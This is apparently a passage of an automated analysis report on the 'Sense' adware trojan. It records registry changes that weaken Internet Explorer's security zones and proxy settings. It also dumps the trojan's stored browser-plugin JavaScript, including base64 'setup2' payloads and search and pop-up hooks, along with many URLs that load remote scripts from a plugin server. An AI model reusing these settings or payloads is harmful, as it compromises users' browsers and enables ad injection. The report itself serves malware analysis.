[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 90 BC B8 1C 57 97 FD 1D 26 C9 AA FB 64 6B DA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Sense-codedownloader.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Sense\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\Sense\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"
[HKCU\Software\Sense\Installer]
"FullVersionForUrl" = "1_34_08_12"
[HKCU\Software\Sense\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Sense\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Sense\Plugins\123]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/123.js"
[HKCU\Software\Sense\Plugins\42]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/42.js"
[HKCU\Software\Sense\Plugins\91]
"Version" = "75"
[HKCU\Software\Sense\Plugins\45]
"Name" = "IEOnRequest"
[HKLM\SOFTWARE\Sense\IE]
"TotalProfiles" = "1"
[HKCU\Software\Sense\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Sense\Plugins\94]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/94.js"
[HKCU\Software\Sense\Plugins\223]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/223.js"
[HKCU\Software\Sense\Plugins\263]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/263.js"
[HKCU\Software\Sense\Plugins\242]
"Version" = "4"
[HKCU\Software\Sense\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\Sense\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Sense\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Sense\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve-"
[HKCU\Software\Crossrider]
"Verifier" = "39aa73fdbfd54b44fad467ed5553801b"
[HKCU\Software\Sense\Manifest]
"Version" = "21"
[HKCU\Software\Sense\Plugins\28]
"Name" = "initializer"
[HKCU\Software\Sense\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Sense\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO-"
[HKCU\Software\Sense\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\Sense\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\Sense\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Sense\Manifest]
"UninstallerOfferUrl" = "NA"
[HKLM\SOFTWARE\Sense\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Sense\Installer]
"srcid" = "000803"
[HKCU\Software\Sense\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Sense\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se."
[HKCU\Software\Sense\Installer]
"subid" = "0"
[HKCU\Software\Sense\Plugins\21]
"Version" = "5"
[HKCU\Software\Sense\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2ZjRkNDU0OTUxNGYxMDAzMTUwMDMwMWYwOTRiNGI0ZDVhMWYxNTA0MTU1NzRhNDYxMjA5MTYxNDAwMTMwZDA4NTQ0NDEwNDMxOTFjMDAxZDA0MDQwZDBkNWYwMzFkMDM0ZTAzMTAwZjRhMWY0MjVmNDk0ZTAzMTQ0YTMyM2EyYTIzMjIyYjI0MzMzOTIxMjgzNzM2MjIzODNhMjgyODM0M2EzMjRhMDU1ZjA3MGI0ODExMTkwMTUwNTQ1OTQ4NTk1ZTEyMTkwNDU4MzIzYTJhMjMyMjJiMjQzMzM5MjEyODM3MzYzMDNkMjgyODJmMzEyODI4M2EzNjU3MWUwMTA0MTUxNTA4MDQwMTU0MmUzMjNiMjUyZTIzMzYzZjJjMmQzNDNmMjczZTJmMjMzMTJjMjkyNTM0M2YyNzIyMzIzNTM3MzIyYzJkMmUzMjVhNWI2YjUwNDU0ZDQ1NGIxOTE5MGMwNzEyMjUxNzAxNDc1MzUxNGYxMDAzMTUwMDE2NTc0YTQ2MTIwOTE2MTQwMDEzMGQwODU0NDQxMDQzMTkxYzAwMWQwNDA0MGQwZDVmMDMxZDAzNGUwMzEwMGY0YTFmNDI1ZjQ5NGUwMzE0NGEzMjNhMmEyMzIyMmIyNDMzMzkyMTI4MzczNjIyMzgzYTI4MjgzNDNhMzI0YTA1NWYwNzBiNDgxMTE5MDE1MDU0NTk0ODU5NWUxMjE5MDQ1ODMyM2EyYTIzMjIyYjI0MzMzOTIxMjgzNzM2MzAzZDI4MjgyZjMxMjgyODNhMzY1NzFlMDEwNDE1MTUwODA0MDE1NDJlMzIzYjI1MmUyMzM2M2YyYzJkMzQzZjI3M2UyZjIzMzEyYzI5MjUzNDNmMjcyMjMyMzUzNzMyMmMyZDJlMzI1YTViNmI1MDQ1NGQ0NTRiMDEwMTBkMTAwODFlMmMwOTQ3NTM1MTVmNGU0NDZiMGQ=', 'pemeiqmxwa'"
[HKCU\Software\Sense\Installer]
"AdditionalInfo" = "{asw:[0, 1073750528, 0],browser_name:ie}"
[HKCU\Software\Sense\Plugins\226]
"URL" = "http://js.loadgenclientservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\Sense\Plugins\78]
"Version" = "5"
[HKCU\Software\Sense\Plugins\183]
"Version" = "4"
[HKCU\Software\Sense\Plugins\47]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/47.js"
[HKCU\Software\Sense\Plugins\45]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\Sense\Plugins\262]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/262.js"
[HKCU\Software\Sense\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"
[HKCU\Software\Sense\Manifest]
"RunInFrame" = "false"
"PublisherName" = "Object Browser"
[HKCU\Software\Sense\Plugins\1]
"Name" = "base"
[HKCU\Software\Sense\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"
[HKCU\Software\Sense\Plugins\17]
"Version" = "4"
[HKCU\Software\Sense\Update]
"LastCheck" = "1411237392"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Sense\Plugins\44]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/44.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Sense\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\Sense\Plugins\93]
"Version" = "13"
[HKCU\Software\Sense\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Sense\Plugins\207]
"Version" = "2"
[HKCU\Software\Sense\Plugins\192]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/192.js"
[HKCU\Software\Sense\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi-"
"Version" = "4"
[HKCU\Software\Sense\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Sense\Plugins\223]
"Version" = "8"
[HKCU\Software\Sense\Plugins\94]
"Version" = "2"
[HKCU\Software\Sense\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Sense\Plugins\226]
"Version" = "5"
[HKCU\Software\Sense\Plugins\41]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/41.js"
[HKCU\Software\Sense\Plugins\72]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/72.js"
[HKCU\Software\Sense\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\Sense\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIe-"
[HKCU\Software\Sense\Plugins\22]
"Name" = "resources"
[HKCU\Software\Sense\Plugins\2]
"Version" = "2"
[HKCU\Software\Sense\Plugins\102]
"Version" = "10"
[HKCU\Software\Sense\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\Sense\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3YTYzNGMxYzA2MTkwNTNlMTQwNjUyNTA0ZTU2MWExOTAxMWI1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjAyMWEwMDAyMWUyMDE5MGE0ODRhNGE0YzFjMDYxOTA1MTg1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjFhMDIwMTE1MDQxYjIyMDI0ODRhNGE1ZjRkNDA0MTdmNGI0NjRhNTA0ODE4MTEwMDE5MWMwODA3MDY1MjUwNGUyZjUwMGMxMTE4NDQzNzVjNjA0ZTU0NTI0ZDU3MDIwODA2MTkwNDBiM2UyMTRmNGY0YjQ0MWQxOTA0MGExYjA1NDMyYTE5MTAxMDQxNWQ1ZTQ0MGE1YzQ1NWI1ZTRhNGQ0YTE1NTQ1NTFkMDAwOTBhMDMwMzAyMGIwNjJkMWUwMDA5MGYwZTU3NTA0ZTUzMmQzMjM2MzkyOTM5MjMzODI3MzAzNzNmMmEyZTNlM2UzNTI0MmEzMTM2MzIyNjNlMjQzNTM5MmUzMTJiNTU0MTU1NGMwNzBlMTQwNTAwMWExMzAwMTA0YzVjNGE1NzM1MzEzNzIwMjIyNjM4MzQyMzM0MmYzYzJiMzMzZDI1MzQyODJiM2QyZjMxMmI1NTEwNGU0OTZjMTc=', 'jpjntrmukf'); }"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Sense\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Sense\Manifest]
"BgVersion" = "1"
[HKCU\Software\Sense\Plugins\38]
"Version" = "4"
[HKCU\Software\Sense\Plugins\246]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/246.js"
[HKCU\Software\Sense\Plugins\183]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/183.js"
[HKCU\Software\Sense\Installer]
"osName" = "XP32"
[HKCU\Software\Sense\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\Sense\Plugins\263]
"Version" = "1"
[HKCU\Software\Sense\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\Sense\Plugins\1]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/1.js"
[HKCU\Software\Sense\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Sense\Manifest]
"ChangePrevious" = "false"
[HKCU\Software\Sense\Plugins\177]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/177.js"
[HKCU\Software\Sense\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length"
[HKCU\Software\Sense\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) { if (appAPI.internal.monetization.getCampaignId() == 0) { appAPI.internal.monetization.loader.setCampaignId(1026); } }};"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Sense\Plugins\123]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ZDZmNDAwNDBjMTkxNDMxMGExYTU1NWM0MjRlMTAxOTEwMTQ0MjU5NTgwZjBjMTgxZDE1MTA0YTE2MTcwMTRiMGUwNTE2MDYxNzRhMWIxOTFhNDkwODFmNTcwNDBhMTAxZDBlMDM0ODA4MWY0NzBjMDIwZDFjNGIxNDE0MGQxZjBiMWYwZDAwMWQwNDUxMTUxNzBlMTEwOTU5M2IyNzM1MjUyOTMxM2YyYTI0MjAyMTJhMjkzMjNlMzYyOTM2MjkyMTIwMjcyNTIyMjQzZDI1M2MzMjNiNDIxNTE3MGYwYTBiMDIxMzFlNTk1YzVlMWExZTA4MDkwZjE3MDEwYjE2NDU0NjQ3NTY1MjJhM2U0YjA2MTYxOTE4MTM1YjNkMzMzYjNmMmIzNzJiMjQzZTIyMjczZTI3MmMzNDM0MjczODM2MmIyNzMzMjc0ZjQ4NmU3MTU0MWYxMjE2MWMwYjM4MTYwODVhNGM1NzQ0MGExODBjMWQxNzVlNTc1OTFlMDgxNjA5MDAxOTRhMGExOTAwNWEwYTBiMDIxMzFlNGEwNzE3MWI1ODBjMTE0MzExMDMxMDAxMDAwMjU5MGMxMTUzMTkwYjBkMDA0NTE1MDUwOTExMWYwYTA0MDAwMTBhNTAwNDEzMDAwNTFjNTAzYjNiM2IyNDM4MzUzMTNlMzEyOTIxMzYyNzMzMmYzMjI3MjIzYzI4MjAzYjJiMjMzNTM5MmIyODI3MzI0MjA5MTkwZTFiMGYwYzA3MGI1MDVjNDIxNDFmMTkwZDAxMDMxNDAyMTY1OTQ4NDY0NzU2MjQyYTVlMGYxNjA1MTYxMjRhMzkzZDJmMmEyMjM3MzcyYTNmMzMyMzMwMzMzOTNkMzQzYjM2MzczYTIzM2QzMzVhNDE2ZTZkNWEwNjFiMTMwNTA1MTYyNDAwNDY0MjU2NDY1NDUxNjYwNQ==', 'vwfblxmddx'); }"
[HKCU\Software\Sense\Plugins\1]
"Version" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Sense\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODV